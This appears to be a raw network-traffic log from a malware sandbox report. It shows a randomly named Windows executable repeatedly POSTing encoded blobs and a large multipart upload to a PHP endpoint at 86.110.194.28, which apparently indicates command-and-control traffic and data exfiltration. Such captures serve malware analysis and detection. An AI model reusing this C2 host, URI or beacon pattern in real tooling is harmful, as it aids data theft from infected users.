                                                                                                                                                                  Jan 3, 2025 09:07:39.414228916 CET380INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:07:39 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                  Content-Length: 152
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 0d 1d 24 10 26 2b 36 5c 2a 2f 01 10 25 0d 25 5f 21 20 20 14 2f 30 3a 0b 23 3c 3a 00 25 28 20 54 28 2e 29 1a 2b 33 3d 1d 20 2e 0b 52 3c 0a 28 5d 03 10 39 13 2b 3e 23 1f 28 3e 0b 59 2e 51 3b 19 30 0e 23 00 3d 0a 2e 08 31 02 36 55 35 2e 20 0e 2a 0a 21 5b 24 2b 2b 04 3c 0e 2f 12 24 07 20 54 0b 17 27 55 24 1e 06 07 26 38 00 01 3d 37 1a 10 26 2a 0b 56 23 2c 35 0f 20 39 06 5a 2f 30 00 0e 27 06 0b 55 3d 07 33 53 25 29 31 03 26 3b 2e 5c 23 0f 28 55 0d 34 57 50
                                                                                                                                                                  Data Ascii: $&+6\*/%%_! /0:#<:%( T(.)+3= .R<(]9+>#(>Y.Q;0#=.16U5. *![$++</$ T'U$&8=7&*V#,5 9Z/0'U=3S%)1&;.\#(U4WP
                                                                                                                                                                  Jan 3, 2025 09:07:39.428487062 CET352OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Jan 3, 2025 09:07:39.646315098 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:07:39.646555901 CET2576OUTData Raw: 5e 52 5b 5a 5d 5c 55 5c 54 5b 59 5a 5b 53 57 52 5f 52 5a 54 52 5c 50 41 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: ^R[Z]\U\T[YZ[SWR_RZTR\PA_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%<.&"<S1< (86[0$.%,* 4%V7^0\$_$A0?0W+#Y'$X.1
                                                                                                                                                                  Jan 3, 2025 09:07:39.868927002 CET151INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:07:39 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  17192.168.2.44975886.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:07:40.013098001 CET352OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  18192.168.2.44975986.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:07:40.029356956 CET422OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----NZZp5qhoIWq2NhqjOGZR4udlu3EyxDui93
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 188810
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:07:40.379281998 CET12360OUTData Raw: 2d 2d 2d 2d 2d 2d 4e 5a 5a 70 35 71 68 6f 49 57 71 32 4e 68 71 6a 4f 47 5a 52 34 75 64 6c 75 33 45 79 78 44 75 69 39 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 30 22
                                                                                                                                                                  Data Ascii: ------NZZp5qhoIWq2NhqjOGZR4udlu3EyxDui93Content-Disposition: form-data; name="0"Content-Type: text/plain[P[]]YPPT[YZ[VWR_]ZXRRPA_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZ
                                                                                                                                                                  Jan 3, 2025 09:07:40.384284973 CET12360OUTData Raw: 63 76 71 4e 59 6c 46 59 35 4a 31 6b 43 30 39 68 36 62 63 51 45 6d 44 2f 56 4b 4a 70 56 33 45 68 36 6a 47 6b 6e 4c 4f 5a 6e 2f 74 38 4c 30 7a 35 52 36 46 57 73 75 41 38 63 56 4a 33 68 4c 6c 42 72 4c 79 66 62 35 79 50 52 55 72 2b 7a 31 68 66 6a 39
                                                                                                                                                                  Data Ascii: cvqNYlFY5J1kC09h6bcQEmD/VKJpV3Eh6jGknLOZn/t8L0z5R6FWsuA8cVJ3hLlBrLyfb5yPRUr+z1hfj969WCYdnPOXc1UMymuyCzV3dsZfaYcvCNozvld0g3mqM9RCOMkiPVbMjlnkvtfttkOjrqxfzSosFcKpd/zsd35eNbSpRJWpq7Alvr49ZNXSXVk7iI8WvUW1Wa0r/Udwv69NoX9dJ1M/sTmieWxRhQ57r1g7QwCOv/7
                                                                                                                                                                  Jan 3, 2025 09:07:40.384409904 CET9888OUTData Raw: 6f 31 52 52 70 61 42 73 49 6f 7a 6e 39 73 6a 72 30 2b 41 43 76 71 43 6f 6a 35 63 38 37 57 50 69 74 6f 46 32 78 4d 6b 6e 31 74 37 54 44 45 74 59 70 46 4a 65 53 63 33 45 34 77 4d 68 73 39 37 33 46 65 37 78 2b 47 66 72 4e 51 48 35 36 59 54 32 30 78
                                                                                                                                                                  Data Ascii: o1RRpaBsIozn9sjr0+ACvqCoj5c87WPitoF2xMkn1t7TDEtYpFJeSc3E4wMhs973Fe7x+GfrNQH56YT20xB7mapovMRrF8qpsfOPOn422Pql/pPnI5D8OOkd3ZY+ejnvcd69e1+b7aOC6+gKgwUiFoE1p5n31rF+nBy7TyoXdGXQpi4/N2FVRSNORm964t+jXK6ql/wvqt47ns33ixuPKlqliqhRo60ZO0XtXSv2VpSiSihqr1p
                                                                                                                                                                  Jan 3, 2025 09:07:40.384579897 CET2472OUTData Raw: 33 46 36 2b 72 58 62 79 43 51 75 67 6e 5a 57 53 45 52 67 2f 65 66 42 7a 6a 5a 48 53 7a 47 69 4f 5a 2f 78 50 5a 39 37 4d 6e 37 32 62 4c 78 37 56 71 38 6f 52 78 65 6e 2f 58 61 77 53 34 50 51 2f 2f 2b 44 4d 4c 34 69 43 7a 4b 51 74 46 56 63 77 50 44
                                                                                                                                                                  Data Ascii: 3F6+rXbyCQugnZWSERg/efBzjZHSzGiOZ/xPZ97Mn72bLx7Vq8oRxen/XawS4PQ//+DML4iCzKQtFVcwPDWEbE94qNkHpBDC1ldqpMu4DurytTWlsloSokVwuGgaUySRBJ4hezW4Y9za46x9BseUPIlkpXtCuM5D93pWxvG7KfOWC5X9fuDm7dPm6br5tt7wnxysb7YOmCesU5JodhZ2x3d3lws+xQ0eSI1Rf1hkZqXaxgKuN7E
                                                                                                                                                                  Jan 3, 2025 09:07:40.389156103 CET2472OUTData Raw: 6a 50 73 38 78 55 65 53 64 78 36 64 38 39 78 65 4c 4c 2f 68 65 63 4e 36 6e 36 2b 43 38 69 46 70 62 36 79 56 6f 6a 44 6b 35 33 64 45 6d 48 65 4f 75 4e 51 31 45 73 37 78 43 5a 36 41 6d 31 75 58 58 56 58 4c 78 57 50 64 76 44 38 4e 69 43 50 57 42 4e
                                                                                                                                                                  Data Ascii: jPs8xUeSdx6d89xeLL/hecN6n6+C8iFpb6yVojDk53dEmHeOuNQ1Es7xCZ6Am1uXXVXLxWPdvD8NiCPWBNp7TiKlVps533UdFGRbnG8HPBEiu1YIVT7j46udOj8RZdiWdDLy8Ybqsv6N9dd1kc6xq49mMwnn+KFAZRKsfp/oS3qPpvX+t35tVSfekz4H50LHeiPrwVUJ3+dVGUQ341JJ2A7GqHpuVyWZQ6bfUalJj1nQs1WHZXI
                                                                                                                                                                  Jan 3, 2025 09:07:40.389184952 CET4944OUTData Raw: 7a 67 75 75 68 2b 74 65 55 52 64 47 38 57 75 4b 66 45 42 79 49 6e 59 2b 34 46 63 49 2f 6f 78 58 70 59 53 72 34 57 2f 63 5a 43 49 58 61 31 30 34 41 45 44 72 45 56 30 36 70 48 71 50 30 63 6e 43 59 77 51 62 43 46 46 55 43 70 7a 42 69 47 6e 36 76 71
                                                                                                                                                                  Data Ascii: zguuh+teURdG8WuKfEByInY+4FcI/oxXpYSr4W/cZCIXa104AEDrEV06pHqP0cnCYwQbCFFUCpzBiGn6vq3txo2zMdVSs2HF3hPEQ46N+hPgJ71stxoa8WCWxo51h8eRUyUohkRW4bRCXZgteR4cpl12wzrQQ280FhS75KoMclWDEbPTIXGnnVbUwmfyMA39yi4OSR1wCxerzGHBWyGlcFFg1iHGf8yebi4vCbh0OPjgsprMWXa
                                                                                                                                                                  Jan 3, 2025 09:07:40.389219046 CET2472OUTData Raw: 54 75 66 47 36 65 4d 4e 34 79 78 4a 76 30 43 56 47 6c 2f 6d 35 4b 4c 57 68 42 4c 46 4e 79 6d 37 6d 6d 7a 6b 44 56 53 65 37 4e 35 65 59 74 63 39 4e 6b 30 6e 35 78 35 50 4f 42 30 39 67 31 78 4d 7a 73 31 76 63 4f 73 74 33 6f 53 6e 2f 66 41 67 42 49
                                                                                                                                                                  Data Ascii: TufG6eMN4yxJv0CVGl/m5KLWhBLFNym7mmzkDVSe7N5eYtc9Nk0n5x5POB09g1xMzs1vcOst3oSn/fAgBIR+nXcfmVqL/HHOQGNzo3oOCwj/mPQGNzsTTjSwgNq2M9Bm29jhh0X15r8sf2ZySUmOPweJrinWVfSPeQX97PGbb2V8Oycz9tM4ZDUpNtjXySKftiObVJG8E4w2iV0FA/O3qDDf6S1Z/OM+APfQhkQens/XS+CtLnW
                                                                                                                                                                  Jan 3, 2025 09:07:40.389269114 CET4944OUTData Raw: 47 33 64 66 6a 4f 74 49 48 46 4b 77 5a 77 71 4b 51 52 65 54 61 35 53 72 2b 43 6b 6b 67 35 55 50 43 35 5a 45 49 45 72 46 64 35 49 4c 74 70 59 32 39 57 6e 4f 39 43 45 54 48 48 6f 4a 4e 36 39 46 36 2f 64 75 4b 59 75 58 38 43 2f 64 51 4d 79 63 6e 59
                                                                                                                                                                  Data Ascii: G3dfjOtIHFKwZwqKQReTa5Sr+Ckkg5UPC5ZEIErFd5ILtpY29WnO9CETHHoJN69F6/duKYuX8C/dQMycnY3ttaNxnjqsG4fKcU9gUCCNmxQOoPsy6mtbyCNGVa1YLvy0wjOghZO58PBDDFSWQY+r26fYNrcwXXGnS2BBbQuFsIcuTcePvV9Nd4DI/45DpUNnzy4NmCNQCOKlqZYH82eo4y21cZQt0wpQD7YmYwDjaXJ1dXw1mR5
                                                                                                                                                                  Jan 3, 2025 09:07:40.435425043 CET34608OUTData Raw: 50 4b 6d 57 63 54 6a 53 7a 6d 56 46 62 44 56 46 61 57 69 49 49 31 55 39 47 42 65 48 5a 76 6c 33 32 79 75 45 49 79 50 69 46 2f 34 41 5a 41 42 6e 69 32 65 38 44 73 62 52 75 33 41 5a 7a 4c 46 50 73 4b 6c 77 68 55 51 59 5a 31 2f 48 67 4e 55 74 78 6e
                                                                                                                                                                  Data Ascii: PKmWcTjSzmVFbDVFaWiII1U9GBeHZvl32yuEIyPiF/4AZABni2e8DsbRu3AZzLFPsKlwhUQYZ1/HgNUtxnEkMUW7rDTCTFAA1btABpVHIO1HvGwMK2n4QS4KzGmE9P0qSZClwDsVD0AwSXCfKkDIKy7PbfXiBYwkwrBXa/LKmr3J/MMbyyDddHMM0LImaxRhwL+rDMMDb7JwUynQtkJ5Y0iHhP2NUr48bmABnw2dP78tFPggR1Y
                                                                                                                                                                  Jan 3, 2025 09:07:40.487344980 CET1236OUTData Raw: 63 76 50 43 43 75 47 52 7a 42 55 39 67 52 79 4b 6e 57 50 76 38 77 67 67 66 42 7a 77 6b 6a 50 37 50 56 67 6e 2b 56 33 68 59 44 4f 69 53 59 56 4d 56 63 64 70 72 5a 59 33 30 68 35 68 79 46 6e 34 36 32 39 6b 38 35 66 49 79 2b 4e 76 34 53 37 39 48 61
                                                                                                                                                                  Data Ascii: cvPCCuGRzBU9gRyKnWPv8wggfBzwkjP7PVgn+V3hYDOiSYVMVcdprZY30h5hyFn4629k85fIy+Nv4S79Ha7qfVX8A/2TtP9LEP631scv908a7j8pp49yPKBWPtyCIuLagkUQ2EUFcW0R1Mojubo4gpOW4/mNnG14/ykAqtQ4QKS6MvYprMeDhCrb+XHFkF21fnw4VCmWbh86ZBPbbqHavQqT6Le3Brabz5ojZ9vrhSEa4ngsx5l
                                                                                                                                                                  Jan 3, 2025 09:07:40.722963095 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:07:41.100665092 CET207INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:07:40 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  19192.168.2.44976086.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:07:40.167572975 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:07:40.519938946 CET2576OUTData Raw: 5e 50 5b 5a 5d 5d 55 5a 54 5b 59 5a 5b 5e 57 5e 5f 57 5a 5b 52 52 50 42 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: ^P[Z]]UZT[YZ[^W^_WZ[RRPB_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&@(.#9#1?$=;*X0$1?6B!Q730?&?<)#Y'$X.
                                                                                                                                                                  Jan 3, 2025 09:07:40.873821974 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:07:41.007142067 CET207INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:07:40 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  20192.168.2.44976186.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:07:41.139750957 CET352OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Jan 3, 2025 09:07:41.488652945 CET2576OUTData Raw: 5b 50 5e 51 5d 5d 50 5b 54 5b 59 5a 5b 5f 57 58 5f 57 5a 58 52 57 50 49 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [P^Q]]P[T[YZ[_WX_WZXRWPI_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&(!6)<U1,E=(2[0.',! 47873$D$?(#Y'$X.
                                                                                                                                                                  Jan 3, 2025 09:07:41.846468925 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:07:41.979756117 CET151INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:07:41 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  21192.168.2.44976286.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:07:42.102443933 CET352OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2568
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Jan 3, 2025 09:07:42.457386971 CET2568OUTData Raw: 5b 50 5b 5a 58 5a 55 5f 54 5b 59 5a 5b 57 57 5a 5f 51 5a 5d 52 52 50 45 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [P[ZXZU_T[YZ[WWZ_QZ]RRPE_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%?&!) %$B*8=3B%Z2,%6)4;3$_?3?(#Y'$X.%
                                                                                                                                                                  Jan 3, 2025 09:07:42.791832924 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:07:42.922086954 CET151INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:07:42 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  22192.168.2.44976386.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:07:43.057610035 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2568
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:07:43.410531998 CET2568OUTData Raw: 5e 50 5e 5c 58 59 50 5c 54 5b 59 5a 5b 57 57 5c 5f 57 5a 55 52 55 50 45 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: ^P^\XYP\T[YZ[WW\_WZURUPE_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&B)>!59 $,>.^3')&<*!'&44Y0)8'8S))#Y'$X.
                                                                                                                                                                  Jan 3, 2025 09:07:43.753654003 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:07:43.881896019 CET207INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:07:43 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  23192.168.2.44976486.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:07:44.008955002 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:07:44.363631964 CET2576OUTData Raw: 5b 51 5e 51 58 5b 50 5c 54 5b 59 5a 5b 54 57 59 5f 53 5a 55 52 50 50 46 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [Q^QX[P\T[YZ[TWY_SZURPPF_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%?>=Z!$U1//>)$B>2,!S $ ++'9438(#Y'$X.-


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  24192.168.2.44976586.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:07:44.431796074 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2164
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:07:44.785984993 CET2164OUTData Raw: 5e 55 5e 5e 58 57 50 5b 54 5b 59 5a 5b 5e 57 53 5f 51 5a 54 52 51 50 43 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: ^U^^XWP[T[YZ[^WS_QZTRQPC_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&+6!:8S2'>]504>&/=Q5'>#8'$#&??#Y'$X.
                                                                                                                                                                  Jan 3, 2025 09:07:45.137269974 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:07:45.270196915 CET380INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:07:45 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                  Content-Length: 152
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
